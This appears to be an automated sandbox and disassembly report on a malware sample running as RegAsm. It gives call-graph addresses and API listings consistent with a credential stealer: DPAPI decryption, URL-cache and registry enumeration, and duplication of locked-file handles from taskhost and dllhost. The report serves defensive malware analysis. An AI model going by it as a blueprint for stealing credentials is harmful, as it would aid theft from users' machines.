409b98 GetFileAttributesW 38534->39121 39120 
408560 29 API calls 38535->39120 38538 4089ad 38539 4089b2 38538->38539 38540 4089c7 38538->38540 39122 408560 29 API calls 38539->39122 39123 409b98 GetFileAttributesW 38540->39123 38543 4089d3 38543->38532 38544 4089d8 38543->38544 39124 408560 29 API calls 38544->39124 38547 40b633 free 38546->38547 38548 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38547->38548 38549 413f00 Process32NextW 38548->38549 38550 413da5 OpenProcess 38549->38550 38551 413f17 CloseHandle 38549->38551 38552 413df3 memset 38550->38552 38555 413eb0 38550->38555 38551->38290 39147 413f27 38552->39147 38554 413ebf free 38554->38555 38555->38549 38555->38554 38556 4099f4 3 API calls 38555->38556 38556->38555 38558 413e37 GetModuleHandleW 38559 413e46 38558->38559 38561 413e1f 38558->38561 38559->38561 38560 413e6a QueryFullProcessImageNameW 38560->38561 38561->38558 38561->38560 39152 413959 38561->39152 39168 413ca4 38561->39168 38563 413ea2 CloseHandle 38563->38555 38565 414c2e 16 API calls 38564->38565 38566 403eb7 38565->38566 38567 414c2e 16 API calls 38566->38567 38568 403ec5 38567->38568 38569 409d1f 6 API calls 38568->38569 38570 403ee2 38569->38570 38571 409d1f 6 API calls 38570->38571 38572 403efd 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403f15 38573->38574 38575 403af5 20 API calls 38574->38575 38576 403f29 38575->38576 38577 403af5 20 API calls 38576->38577 38578 403f3a 38577->38578 38579 40414f 33 API calls 38578->38579 38580 403f4f 38579->38580 38581 403faf 38580->38581 38583 403f5b memset 38580->38583 38585 4099c6 2 API calls 38580->38585 38586 40a8ab 9 API calls 38580->38586 39181 40b1ab free free 38581->39181 38583->38580 38584 403fb7 38584->38229 38585->38580 38586->38580 38588 414c2e 16 API calls 38587->38588 38589 403d26 38588->38589 38590 414c2e 16 API calls 38589->38590 38591 403d34 38590->38591 38592 409d1f 6 API calls 38591->38592 38593 403d51 38592->38593 38594 409d1f 6 API calls 38593->38594 38595 403d6c 38594->38595 38596 409d1f 6 API 
calls 38595->38596 38597 403d84 38596->38597 38598 403af5 20 API calls 38597->38598 38599 403d98 38598->38599 38600 403af5 20 API calls 38599->38600 38601 403da9 38600->38601 38602 40414f 33 API calls 38601->38602 38603 403dbe 38602->38603 38604 403e1e 38603->38604 38606 403dca memset 38603->38606 38608 4099c6 2 API calls 38603->38608 38609 40a8ab 9 API calls 38603->38609 39182 40b1ab free free 38604->39182 38606->38603 38607 403e26 38607->38245 38608->38603 38609->38603 38611 414b81 8 API calls 38610->38611 38612 414c40 38611->38612 38613 414c73 memset 38612->38613 39183 409cea 38612->39183 38614 414c94 38613->38614 39186 414592 RegOpenKeyExW 38614->39186 38617 414c64 SHGetSpecialFolderPathW 38619 414d0b 38617->38619 38619->38249 38620 414cc1 38621 414cf4 wcscpy 38620->38621 39187 414bb0 wcscpy 38620->39187 38621->38619 38623 414cd2 39188 4145ac RegQueryValueExW 38623->39188 38625 414ce9 RegCloseKey 38625->38621 38627 409d43 wcscpy 38626->38627 38629 409d62 38626->38629 38628 409719 2 API calls 38627->38628 38630 409d51 wcscat 38628->38630 38631 445389 38629->38631 38630->38629 38632 40ae18 9 API calls 38631->38632 38633 4453c4 38632->38633 38634 40ae51 9 API calls 38633->38634 38635 4453f3 38633->38635 38636 40add4 2 API calls 38633->38636 38639 445403 250 API calls 38633->38639 38634->38633 38637 40aebe FindClose 38635->38637 38636->38633 38638 4453fe 38637->38638 38638->38297 38639->38633 38640->38201 38641->38293 38642->38277 38643->38277 38644->38307 38646 409c89 38645->38646 38646->38332 38647->38361 38649 413d39 38648->38649 38650 413d2f FreeLibrary 38648->38650 38651 40b633 free 38649->38651 38650->38649 38652 413d42 38651->38652 38653 40b633 free 38652->38653 38654 413d4a 38653->38654 38654->38323 38655->38230 38656->38237 38657->38259 38659 44db70 38658->38659 38660 40b6fc memset 38659->38660 38661 409c70 2 API calls 38660->38661 38662 40b732 wcsrchr 38661->38662 38663 40b743 38662->38663 38664 40b746 memset 38662->38664 38663->38664 38665 40b2cc 27 API 
calls 38664->38665 38666 40b76f 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40b783 38667->38668 39189 409b98 GetFileAttributesW 38668->39189 38670 40b792 38672 409c70 2 API calls 38670->38672 38684 40b7c2 38670->38684 38674 40b7a5 38672->38674 38677 40b2cc 27 API calls 38674->38677 38675 40b837 CloseHandle 38679 40b83e memset 38675->38679 38676 40b817 39273 409a45 GetTempPathW 38676->39273 38680 40b7b2 38677->38680 39223 40a6e6 WideCharToMultiByte 38679->39223 38681 409d1f 6 API calls 38680->38681 38681->38684 38682 40b827 38682->38679 39190 40bb98 38684->39190 38685 40b866 39224 444432 38685->39224 38688 40bad5 38691 40b04b ??3@YAXPAX 38688->38691 38689 40b273 27 API calls 38690 40b89a 38689->38690 39270 438552 38690->39270 38693 40baf3 38691->38693 38693->38270 38695 40bacd 39304 443d90 110 API calls 38695->39304 38698 40bac6 39303 424f26 122 API calls 38698->39303 38699 40b8bd memset 39294 425413 17 API calls 38699->39294 38702 425413 17 API calls 38720 40b8b8 38702->38720 38705 40a71b MultiByteToWideChar 38705->38720 38706 40a734 MultiByteToWideChar 38706->38720 38709 40b9b5 memcmp 38709->38720 38710 4099c6 2 API calls 38710->38720 38711 404423 37 API calls 38711->38720 38714 4251c4 136 API calls 38714->38720 38715 40bb3e memset memcpy 39305 40a734 MultiByteToWideChar 38715->39305 38717 40bb88 LocalFree 38717->38720 38720->38698 38720->38699 38720->38702 38720->38705 38720->38706 38720->38709 38720->38710 38720->38711 38720->38714 38720->38715 38721 40ba5f memcmp 38720->38721 39295 4253ef 16 API calls 38720->39295 39296 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38720->39296 39297 4253af 17 API calls 38720->39297 39298 4253cf 17 API calls 38720->39298 39299 447280 memset 38720->39299 39300 447960 memset memcpy memcpy memcpy 38720->39300 39301 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38720->39301 39302 447920 memcpy memcpy memcpy 38720->39302 38721->38720 38722->38272 38724 40aebe FindClose 38723->38724 38725 40ae21 38724->38725 38726 4099c6 2 
API calls 38725->38726 38727 40ae35 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 40ae49 38728->38729 38729->38336 38731 40ade0 38730->38731 38732 40ae0f 38730->38732 38731->38732 38733 40ade7 wcscmp 38731->38733 38732->38336 38733->38732 38734 40adfe wcscmp 38733->38734 38734->38732 38736 40ae7b FindNextFileW 38735->38736 38737 40ae5c FindFirstFileW 38735->38737 38738 40ae94 38736->38738 38739 40ae8f 38736->38739 38737->38738 38741 40aeb6 38738->38741 38742 409d1f 6 API calls 38738->38742 38740 40aebe FindClose 38739->38740 38740->38738 38741->38336 38742->38741 38744 40aed1 38743->38744 38745 40aec7 FindClose 38743->38745 38744->38198 38745->38744 38747 4099d7 38746->38747 38748 4099da memcpy 38746->38748 38747->38748 38748->38255 38750 40b2cc 27 API calls 38749->38750 38751 44543f 38750->38751 38752 409d1f 6 API calls 38751->38752 38753 44544f 38752->38753 39663 409b98 GetFileAttributesW 38753->39663 38755 44545e 38756 445476 38755->38756 38757 40b6ef 249 API calls 38755->38757 38758 40b2cc 27 API calls 38756->38758 38757->38756 38759 445482 38758->38759 38760 409d1f 6 API calls 38759->38760 38761 445492 38760->38761 39664 409b98 GetFileAttributesW 38761->39664 38763 4454a1 38764 4454b9 38763->38764 38765 40b6ef 249 API calls 38763->38765 38764->38275 38765->38764 38766->38274 38767->38298 38768->38304 38769->38339 38770->38319 38771->38369 38772->38369 38773->38350 38774->38380 38775->38382 38776->38384 38778 414c2e 16 API calls 38777->38778 38779 40c2ae 38778->38779 38835 40c1d3 38779->38835 38784 40c3be 38801 40a8ab 38784->38801 38785 40afcf 2 API calls 38786 40c2fd FindFirstUrlCacheEntryW 38785->38786 38787 40c3b6 38786->38787 38788 40c31e wcschr 38786->38788 38789 40b04b ??3@YAXPAX 38787->38789 38790 40c331 38788->38790 38791 40c35e FindNextUrlCacheEntryW 38788->38791 38789->38784 38793 40a8ab 9 API calls 38790->38793 38791->38788 38792 40c373 GetLastError 38791->38792 38794 40c3ad FindCloseUrlCache 38792->38794 38795 40c37e 38792->38795 38796 
40c33e wcschr 38793->38796 38794->38787 38798 40afcf 2 API calls 38795->38798 38796->38791 38797 40c34f 38796->38797 38799 40a8ab 9 API calls 38797->38799 38800 40c391 FindNextUrlCacheEntryW 38798->38800 38799->38791 38800->38788 38800->38794 38929 40a97a 38801->38929 38804 40a8cc 38804->38391 38805 40a8d0 7 API calls 38805->38804 38934 40b1ab free free 38806->38934 38808 40c3dd 38809 40b2cc 27 API calls 38808->38809 38810 40c3e7 38809->38810 38935 414592 RegOpenKeyExW 38810->38935 38812 40c3f4 38813 40c50e 38812->38813 38814 40c3ff 38812->38814 38828 405337 38813->38828 38815 40a9ce 4 API calls 38814->38815 38816 40c418 memset 38815->38816 38936 40aa1d 38816->38936 38819 40c471 38821 40c47a _wcsupr 38819->38821 38820 40c505 RegCloseKey 38820->38813 38822 40a8d0 7 API calls 38821->38822 38823 40c498 38822->38823 38824 40a8d0 7 API calls 38823->38824 38825 40c4ac memset 38824->38825 38826 40aa1d 38825->38826 38827 40c4e4 RegEnumValueW 38826->38827 38827->38820 38827->38821 38938 405220 38828->38938 38830 405340 38830->38405 38831->38402 38832->38404 38833->38405 38834->38398 38836 40ae18 9 API calls 38835->38836 38842 40c210 38836->38842 38837 40ae51 9 API calls 38837->38842 38838 40c264 38839 40aebe FindClose 38838->38839 38841 40c26f 38839->38841 38840 40add4 2 API calls 38840->38842 38847 40e5ed memset memset 38841->38847 38842->38837 38842->38838 38842->38840 38843 40c231 _wcsicmp 38842->38843 38845 40c1d3 34 API calls 38842->38845 38843->38842 38844 40c248 38843->38844 38860 40c084 21 API calls 38844->38860 38845->38842 38848 414c2e 16 API calls 38847->38848 38849 40e63f 38848->38849 38850 409d1f 6 API calls 38849->38850 38851 40e658 38850->38851 38861 409b98 GetFileAttributesW 38851->38861 38853 40e667 38854 409d1f 6 API calls 38853->38854 38856 40e680 38853->38856 38854->38856 38862 409b98 GetFileAttributesW 38856->38862 38857 40e68f 38858 40c2d8 38857->38858 38863 40e4b2 38857->38863 38858->38784 38858->38785 38860->38842 38861->38853 38862->38857 38884 
40e01e 38863->38884 38865 40e593 38866 40e5b0 38865->38866 38867 40e59c DeleteFileW 38865->38867 38868 40b04b ??3@YAXPAX 38866->38868 38867->38866 38870 40e5bb 38868->38870 38869 40e521 38869->38865 38907 40e175 38869->38907 38872 40e5c4 CloseHandle 38870->38872 38873 40e5cc 38870->38873 38872->38873 38875 40b633 free 38873->38875 38874 40e573 38876 40e584 38874->38876 38877 40e57c CloseHandle 38874->38877 38878 40e5db 38875->38878 38928 40b1ab free free 38876->38928 38877->38876 38879 40b633 free 38878->38879 38881 40e5e3 38879->38881 38881->38858 38883 40e540 38883->38874 38927 40e2ab 30 API calls 38883->38927 38885 406214 22 API calls 38884->38885 38886 40e03c 38885->38886 38887 40e16b 38886->38887 38888 40dd85 60 API calls 38886->38888 38887->38869 38889 40e06b 38888->38889 38889->38887 38890 40afcf ??2@YAPAXI ??3@YAXPAX 38889->38890 38891 40e08d OpenProcess 38890->38891 38892 40e0a4 GetCurrentProcess DuplicateHandle 38891->38892 38896 40e152 38891->38896 38893 40e0d0 GetFileSize 38892->38893 38894 40e14a CloseHandle 38892->38894 38897 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38893->38897 38894->38896 38895 40e160 38899 40b04b ??3@YAXPAX 38895->38899 38896->38895 38898 406214 22 API calls 38896->38898 38900 40e0ea 38897->38900 38898->38895 38899->38887 38901 4096dc CreateFileW 38900->38901 38902 40e0f1 CreateFileMappingW 38901->38902 38903 40e140 CloseHandle CloseHandle 38902->38903 38904 40e10b MapViewOfFile 38902->38904 38903->38894 38905 40e13b CloseHandle 38904->38905 38906 40e11f WriteFile UnmapViewOfFile 38904->38906 38905->38903 38906->38905 38908 40e18c 38907->38908 38909 406b90 11 API calls 38908->38909 38910 40e19f 38909->38910 38911 40e1a7 memset 38910->38911 38912 40e299 38910->38912 38917 40e1e8 38911->38917 38913 4069a3 ??3@YAXPAX free 38912->38913 38914 40e2a4 38913->38914 38914->38883 38915 406e8f 13 API calls 38915->38917 38916 406b53 SetFilePointerEx ReadFile 38916->38917 38917->38915 38917->38916 38918 40e283 38917->38918 
38919 40dd50 _wcsicmp 38917->38919 38923 40742e 8 API calls 38917->38923 38924 40aae3 wcslen wcslen _memicmp 38917->38924 38925 40e244 _snwprintf 38917->38925 38920 40e291 38918->38920 38921 40e288 free 38918->38921 38919->38917 38922 40aa04 free 38920->38922 38921->38920 38922->38912 38923->38917 38924->38917 38926 40a8d0 7 API calls 38925->38926 38926->38917 38927->38883 38928->38865 38930 40a980 38929->38930 38931 40a8bb 38930->38931 38932 40a995 _wcsicmp 38930->38932 38933 40a99c wcscmp 38930->38933 38931->38804 38931->38805 38932->38930 38933->38930 38934->38808 38935->38812 38937 40aa23 RegEnumValueW 38936->38937 38937->38819 38937->38820 38939 40522a 38938->38939 38964 405329 38938->38964 38940 40b2cc 27 API calls 38939->38940 38941 405234 38940->38941 38942 40a804 8 API calls 38941->38942 38943 40523a 38942->38943 38965 40b273 38943->38965 38945 405248 _mbscpy _mbscat 38946 40526c 38945->38946 38947 40b273 27 API calls 38946->38947 38948 405279 38947->38948 38949 40b273 27 API calls 38948->38949 38950 40528f 38949->38950 38951 40b273 27 API calls 38950->38951 38952 4052a5 38951->38952 38953 40b273 27 API calls 38952->38953 38954 4052bb 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052d1 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052e7 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052fd 38959->38960 38961 40b273 27 API calls 38960->38961 38962 405313 38961->38962 38963 40b273 27 API calls 38962->38963 38963->38964 38964->38830 38966 40b58d 27 API calls 38965->38966 38967 40b18c 38966->38967 38967->38945 38969 40440c FreeLibrary 38968->38969 38970 40436d 38969->38970 38971 40a804 8 API calls 38970->38971 38972 404377 38971->38972 38973 4043f7 38972->38973 38974 40b273 27 API calls 38972->38974 38973->38409 38973->38413 38975 40438d RtlAllocateHeap 38974->38975 38976 40b273 27 API calls 38975->38976 38977 4043a7 38976->38977 38978 40b273 27 API calls 38977->38978 38979 4043ba 38978->38979 38980 40b273 27 API calls 

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                • API String ID: 2018390131-3398334509
                                                                                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                                                                • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                • API String ID: 3957639419-1740548384
                                                                                                                                                                                • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                • String ID: BIN
                                                                                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                • free.MSVCRT ref: 00418803
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1355100292-0
                                                                                                                                                                                • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1945712969-0
                                                                                                                                                                                • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                • memset.MSVCRT ref: 00445AC6
